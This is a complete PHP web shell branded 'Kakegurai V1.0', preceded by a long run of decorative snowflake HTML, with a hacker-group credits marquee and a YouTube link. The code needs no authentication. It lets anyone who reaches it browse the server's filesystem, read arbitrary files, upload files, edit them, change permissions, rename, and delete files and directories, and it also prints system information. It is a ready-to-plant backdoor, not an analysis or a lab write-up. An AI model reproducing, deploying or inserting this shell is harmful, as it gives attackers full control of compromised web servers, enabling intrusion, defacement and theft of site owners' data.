absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 148.061px; top: 59.3829px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 488.799px; top: -154.578px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1713.75px; top: -396.956px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1035.35px; top: 176.209px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1562px; top: -151px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 685.407px; top: -495.201px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1228px; top: -263px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 592.424px; top: -205.911px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 554.663px; top: -565.502px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 48.1904px; top: 92.2703px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1086.33px; top: 615.121px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 209.359px; top: -62.3586px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1638px; top: -505px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 357px; top: -803px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1339px; top: -554px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1702px; top: -562px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1242px; top: -662px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1342px; top: -196px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 420px; top: -611px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1265px; top: -824px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1313px; top: -336px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 157px; top: -335px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1431px; top: -412px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1070px; top: -566px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 390px; top: -765px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1017px; top: -78px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 304px; top: -923px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1360px; top: -462px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1393px; top: -455px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1182px; top: -538px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 407px; top: -450px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 494px; top: -832px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 120px; top: -555px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1702px; top: -421px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1012px; top: -470px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 607px; top: -278px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 99px; top: -856px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 988px; top: -387px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1783px; top: -357px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 918px; top: -647px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1603px; top: -645px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 276px; top: -127px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 900px; top: -689px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1141px; top: -223px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 521px; top: -215px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 691px; top: -867px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 796px; top: -616px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1127px; top: -758px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 354px; top: -560px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1717px; top: -18px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1734px; top: -13px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1135px; top: -930px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 201px; top: -536px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 155px; top: -549px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 11px; top: -740px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 859px; top: -238px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 166px; top: -17px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 422px; top: -814px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 855px; top: -68px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 189px; top: -420px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1510px; top: -24px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 424px; top: -90px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 916px; top: -409px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1306px; top: -416px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 257px; top: -821px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1593px; top: -602px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1595px; top: -118px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 216px; top: -508px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1531px; top: -469px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 261px; top: -16px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1023px; top: -52px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 361px; top: -119px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 518px; top: -73px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 117px; top: -551px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1049px; top: -873px;">•</div></html>
<?php
set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>KAKEGURAI V1.0</title>
<link rel="icon" href="https://i.top4top.io/p_1787k1epc0.jpeg" />
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
</head>
<body>
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<center>
<a href="<?php $url=basename($_SERVER['PHP_SELF']);echo $url;?>"><b><h1><font face="courier new" color="white">Welcome To Kakegurai </font></h1></b><img width="300" height="300" src="https://c.top4top.io/p_1825v49zj0.jpg"><br><br><audio src="https://c.top4top.io/m_1792ih87p0.mp3" type="audio/mpeg" controls="controls" autoplays="autoplays"></a>
</center>
<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For Kakegurai - Mr.Rex - Faidil - Budi - Apip(KangColi) - Udin - Ivan - Haikal - Reza </font></h4></b></marquee></center>
<br>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<td>
<?php echo php_uname();?>
<br>
<?php
if(isset($_GET['path'])){$path=$_GET['path'];}else {$path=getcwd();}$path=str_replace('\\','/',$path);$paths=explode('/',$path);foreach($paths as $id=>$pat){if($pat==''&&$id==0){$a=true;echo '
<a class="wrn" href="?path=/">/</a>';continue;}if($pat=='')continue;echo '
<a class="wrn" href="?path=';for($i=0;$i<=$id;$i++){echo "$paths[$i]";if($i!=$id)echo "/";}echo '">'.$pat.'</a>/';}echo '
</td>
</tr>
<tr>
<td>';if(isset($_FILES['file'])){if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){echo '
<script>alert("OK");</script>
<br>
';}else{echo '
<script>alert("FAIL");</script>
<br>
';}}?>
<form enctype="multipart/form-data" method="POST">
<input type="file" name="file" />
<input type="submit" value=">>" />
</form>
</td>
</tr>
<?php
if(isset($_GET['filesrc'])){echo " <tr>
<td>
<br>
<center>
";echo "<font color=\"#00FF66 \">".$_GET['filesrc']."</font>";echo '
</center>
</td>
</tr>
</table>
<br>';echo('
<pre>
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
</pre>');}elseif(isset($_GET['option'])&&$_POST['opt']!='delete'){echo ' </table>
<br>
<center>'.$_POST['path'].'
<br>
<br>';if($_POST['opt']=='chmod'){if(isset($_POST['perm'])){if(chmod($_POST['path'],$_POST['perm'])){echo '
<script>alert("OK");</script>
<br>';}else{echo '
<script>alert("FAIL");</script>
<br>';}}?>
<form method="POST">
Permission :
<input name="perm" type="text" size="4" value="<?php echo substr(sprintf('%o',fileperms($_POST['path'])),-4);?>" />
<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value=">>" />
</form>
<?php
}elseif($_POST['opt']=='rename'){if(isset($_POST['newname'])){if(rename($_POST['path'],$path.'/'.$_POST['newname'])){echo '
<script>alert("OK");</script>
<br>';}else{echo '
<script>alert("FAIL");</script>
<br>';}$_POST['name']=$_POST['newname'];}?>
<form method="POST">
New Name :
<input name="newname" type="text" size="20" value="<?php echo $_POST['name'];?>" />
<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
<input type="hidden" name="opt" value="rename">
<input type="submit" value=">>" />
</form>
<?php
}elseif($_POST['opt']=='edit'){if(isset($_POST['src'])){$fp=fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
<script>alert("OK");</script>
<br>';}else{echo '
<script>alert("FAIL");</script>
<br>';}fclose($fp);}?>
<form method="POST">
<textarea cols=80 rows=20 name="src">
<?php echo htmlspecialchars(file_get_contents($_POST['path']));?>
</textarea>
<br>
<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
<input type="hidden" name="opt" value="edit">
<input type="submit" value=">>" />
</form>
<?php
}echo ' </center>';}else{echo ' </table>
<br>
<center>';if(isset($_GET['option'])&&$_POST['opt']=='delete'){if($_POST['type']=='dir'){if(rmdir($_POST['path'])){echo '
<script>alert("OK");</script>
<br>';}else{echo '
<script>alert("FAIL");</script>
<br>';}}elseif($_POST['type']=='file'){if(unlink($_POST['path'])){echo '
<script>alert("OK");</script>
<br>';}else{echo '
<script>alert("FAIL");</script>
<br>';}}}echo '</center>';$scandir=scandir($path);?>
<div id="content">
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td>
<center>Name</center>
</td>
<td>
<center>Size</center>
</td>
<td>
<center>Permissions</center>
</td>
<td>
<center>Options</center>
</td>
</tr>
<?php
foreach($scandir as $dir){if(!is_dir("$path/$dir")||$dir=='.'||$dir=='..')continue;echo "
<tr>
<td>
<a class=\"wrn\" href=\"?path=$path/$dir\">$dir</a>
</td>
<td>
<center>--</center>
</td>
<td>
<center>";if(is_writable("$path/$dir"))echo '<font color="#00BB00">';elseif(!is_readable("$path/$dir"))echo '<font color="red">';echo perms("$path/$dir");if(is_writable("$path/$dir")||!is_readable("$path/$dir"))echo '</font>';echo "</center>
</td>
<td>
<center>
<form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">>\" />
</form>
</center>
</td>
</tr>";}?>
<tr class="first">
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<?php
foreach($scandir as $file){if(!is_file("$path/$file"))continue;$size=filesize("$path/$file")/1024;$size=round($size,3);if($size>=1024){$size=round($size/1024,2).' MB';}else{$size=$size.' KB';}echo " <tr>
<td>
<a class=\"wrn\" href=\"?filesrc=$path/$file&path=$path\">$file</a>
</td>
<td>
<center>".$size."</center>
</td>
<td>
<center>";if(is_writable("$path/$file"))echo '
<font color="#00BB00">';elseif(!is_readable("$path/$file"))echo '
<font color="red">';echo perms("$path/$file");if(is_writable("$path/$file")||!is_readable("$path/$file"))echo '</font>';echo "
</center>
</td>
<td>
<center>
<form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">>\" />
</form>
</center>
</td>
</tr>";}echo '
</table>
</div>';}?>
<br>
<center>
<h4><font face="courier new" color="white">YT Channel :<a href="https://www.youtube.com/channel/UCN2GrmWH8QQsMrtQbWKQzbg"><h4><font color="yellow" face="courier new">LExz78 Official</font></h4></a></div>
</center>
</body>
</html>
<?php
